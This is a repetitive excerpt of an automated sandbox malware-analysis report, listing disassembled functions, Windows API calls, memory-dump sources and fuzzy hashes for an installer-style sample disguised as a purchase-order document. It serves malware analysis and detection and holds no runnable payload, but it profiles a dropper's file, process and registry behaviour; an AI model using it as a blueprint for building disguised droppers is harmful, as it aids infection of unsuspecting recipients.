                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 3585118688-0
                                                              • Opcode ID: 02fa1bc128315b3629317a3bcc306fe2355556fdb58621b14dfff1a53f7edb22
                                                              • Instruction ID: a183927f8f084cdb8571cb7bd96d2202481db38f7d29b0955d5094ceef348c04
                                                              • Opcode Fuzzy Hash: 02fa1bc128315b3629317a3bcc306fe2355556fdb58621b14dfff1a53f7edb22
                                                              • Instruction Fuzzy Hash: EB116171900104EBCF109FA0CD459DF7AB5EB44359F20447BE501B61E1C3794A92DFAA
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                              • CloseHandle.KERNEL32(?), ref: 00405739
                                                              Strings
                                                              • Error launching installer, xrefs: 00405716
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess
                                                              • String ID: Error launching installer
                                                              • API String ID: 3712363035-66219284
                                                              • Opcode ID: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                              • Instruction ID: 68da1b5efeb229702bef63955ccdeefd44cba6198d5a5f20aa9a51b41b675f94
                                                              • Opcode Fuzzy Hash: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                              • Instruction Fuzzy Hash: 59E0BFB4A0420ABFFB109F64EC49F7B766CE710704F808521BD15F2250D7B4AC108A79
                                                              APIs
                                                                • Part of subcall function 00406220: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406283
                                                                • Part of subcall function 00406220: CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                • Part of subcall function 00406220: CharNextW.USER32(?,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406297
                                                                • Part of subcall function 00406220: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 004062AA
                                                              • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00403347
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 4115351271-3144792594
                                                              • Opcode ID: 39a545118ff9827536aa834da4382a8a1ba00f0c03fbe255a403a3aa64501383
                                                              • Instruction ID: c6abd0214a64de7cadaa734fac41eb8380666afbcf661e8bafaab08763a3f1d5
                                                              • Opcode Fuzzy Hash: 39a545118ff9827536aa834da4382a8a1ba00f0c03fbe255a403a3aa64501383
                                                              • Instruction Fuzzy Hash: 37D0522210A93130C84136663E02BCF080CCF0A32AF22807BF804B00C1CB3C1A8208FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                              • Instruction ID: 341b99abf03f2e1941eb6220a2ba2fa20bbc036e9949a5bf9c2c078605d2769f
                                                              • Opcode Fuzzy Hash: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                              • Instruction Fuzzy Hash: 9DA13471E00229DBDB28CFA8C8547ADBBB1FF48305F11816AD856BB281C7785A96CF44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
                                                              • Instruction ID: b24004e2459b3715c883c1996b24246953ff0fb47fcdf85fedfa1614f6e92f62
                                                              • Opcode Fuzzy Hash: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
                                                              • Instruction Fuzzy Hash: 60911270E00228DBDF28CF98C854BADBBB1FF44305F15816AD856BB291C7789996CF44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                              • Instruction ID: 0c07c17b414ad8f17a3ff3e8587382d040bd297e960d91c66a6d9af6720fecf2
                                                              • Opcode Fuzzy Hash: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                              • Instruction Fuzzy Hash: 38815571D00228DFDF24CFA8C844BADBBB1FB44305F25816AD456BB291C7389A96CF54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16c3da451b00ed7501bdbc73778925f50314777a9f5d312f132e9d4e74f014bb
                                                              • Instruction ID: 40c7cf361161e00566e5adfab28d3a5c75941d24eb7bbcfefb24c15ac497d971
                                                              • Opcode Fuzzy Hash: 16c3da451b00ed7501bdbc73778925f50314777a9f5d312f132e9d4e74f014bb
                                                              • Instruction Fuzzy Hash: 91815571D04228DBDF28CFA8C844BADBBB1FB44345F21816AD856BB2C1C7785A96CF45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0cc07006cc7c9aef3fafa63e8afbe90e4e7d7e8d46648082bd87270dbbc6feb7
                                                              • Instruction ID: 456f5d8fd794945b55b5d9b3679d3b1ecbaa17202882ac546044f61b7aaf63b3
                                                              • Opcode Fuzzy Hash: 0cc07006cc7c9aef3fafa63e8afbe90e4e7d7e8d46648082bd87270dbbc6feb7
                                                              • Instruction Fuzzy Hash: 10711471D04228DFDF28CF98C844BADBBB1FB48305F15806AD856BB281D7389996DF54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eec15c9fa71d2bb8ac0e9ab2641b80d47be28fb4f34c6eac6740816efd5aae2a
                                                              • Instruction ID: 8bd2b1db5987d4e4b96b583130c6a33f56c1bdc1121660429b57e4b15e5e4dee
                                                              • Opcode Fuzzy Hash: eec15c9fa71d2bb8ac0e9ab2641b80d47be28fb4f34c6eac6740816efd5aae2a
                                                              • Instruction Fuzzy Hash: DD713471D04228DFDF28CF98C844BADBBB1FB48305F25806AD856BB291C7389996DF54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b7cba6587137bac62e94bd95232145a4a4e4cea60c39cf1103777a64c0d5ae0
                                                              • Instruction ID: b46b7f647ddddaa837b295bcbfdf8fe32b4b15f5abab45eff4fbfa9538c7bc71
                                                              • Opcode Fuzzy Hash: 9b7cba6587137bac62e94bd95232145a4a4e4cea60c39cf1103777a64c0d5ae0
                                                              • Instruction Fuzzy Hash: E7712371D04228DFEF28CF98C844BADBBB1FB44305F25806AD856BB291C7789A56DF44
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                              • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$PointerWrite
                                                              • String ID:
                                                              • API String ID: 539440098-0
                                                              • Opcode ID: 5ffa5ab8b8b542d2bf29b319ea7dfd3044dae09937863daa4ca41a6163888e30
                                                              • Instruction ID: ec1369f47cd2415d1f2b24c1eb1a058245e4710fa78a4886d9d776da59196917
                                                              • Opcode Fuzzy Hash: 5ffa5ab8b8b542d2bf29b319ea7dfd3044dae09937863daa4ca41a6163888e30
                                                              • Instruction Fuzzy Hash: B4314831504218EBDF10CF65ED45A9F3FB8EB09755F20807AF904AA1A0D3349E40DBA9
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FC3
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FD4
                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402051
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 334405425-0
                                                              • Opcode ID: a4a7b2ccd0e98f0921e657f91edebe8813d2c583a05dee18c22fa0c78d0b05c4
                                                              • Instruction ID: cb7cdab3b881820b07126fe4dd0a8ef97d4a76ab9142fcea15e567a1f9a0c19a
                                                              • Opcode Fuzzy Hash: a4a7b2ccd0e98f0921e657f91edebe8813d2c583a05dee18c22fa0c78d0b05c4
                                                              • Instruction Fuzzy Hash: FF21C571904215F6CF206FA5CE48ADEBAB4AF04358F70817BF600B51E0D7B98E41DA6E
                                                              APIs
                                                                • Part of subcall function 00405BD3: GetFileAttributesW.KERNELBASE(?,?,004057D8,?,?,00000000,004059AE,?,?,?,?), ref: 00405BD8
                                                                • Part of subcall function 00405BD3: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405BEC
                                                              • RemoveDirectoryW.KERNEL32(?,?,?,00000000,004059AE), ref: 004057E7
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000000,004059AE), ref: 004057EF
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405807
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                              • String ID:
                                                              • API String ID: 1655745494-0
                                                              • Opcode ID: 149232c8aad9f1b3775c6dd716a29c2aaafc945b621f2dfd4840630b3c941ba6
                                                              • Instruction ID: bd6d4a3e3c8ae2539ca812546755b4e3e529903dede2fe37ad8455e2da4e9ad8
                                                              • Opcode Fuzzy Hash: 149232c8aad9f1b3775c6dd716a29c2aaafc945b621f2dfd4840630b3c941ba6
                                                              • Instruction Fuzzy Hash: D4E02B3250DA9096C35067349C08B5F3AD8DF86314F14493AFD52F21D0E37855469ABF
                                                              APIs
                                                                • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000002DA,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsh620C.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID:
                                                              • API String ID: 3677997916-0
                                                              • Opcode ID: 6c7d1f518fbb7cdee12c91c7a30429344cb31e91ff0c114b69db44f42e44e333
                                                              • Instruction ID: c5a1559a9846988044f9ea67ad03363f87a10785b4b958f0fd2e75887457cd98
                                                              • Opcode Fuzzy Hash: 6c7d1f518fbb7cdee12c91c7a30429344cb31e91ff0c114b69db44f42e44e333
                                                              • Instruction Fuzzy Hash: BB117371915205EEDF14CFA0C6889AFB7B4EF44359F20843FE042A72D0D7B85A41DB6A
                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
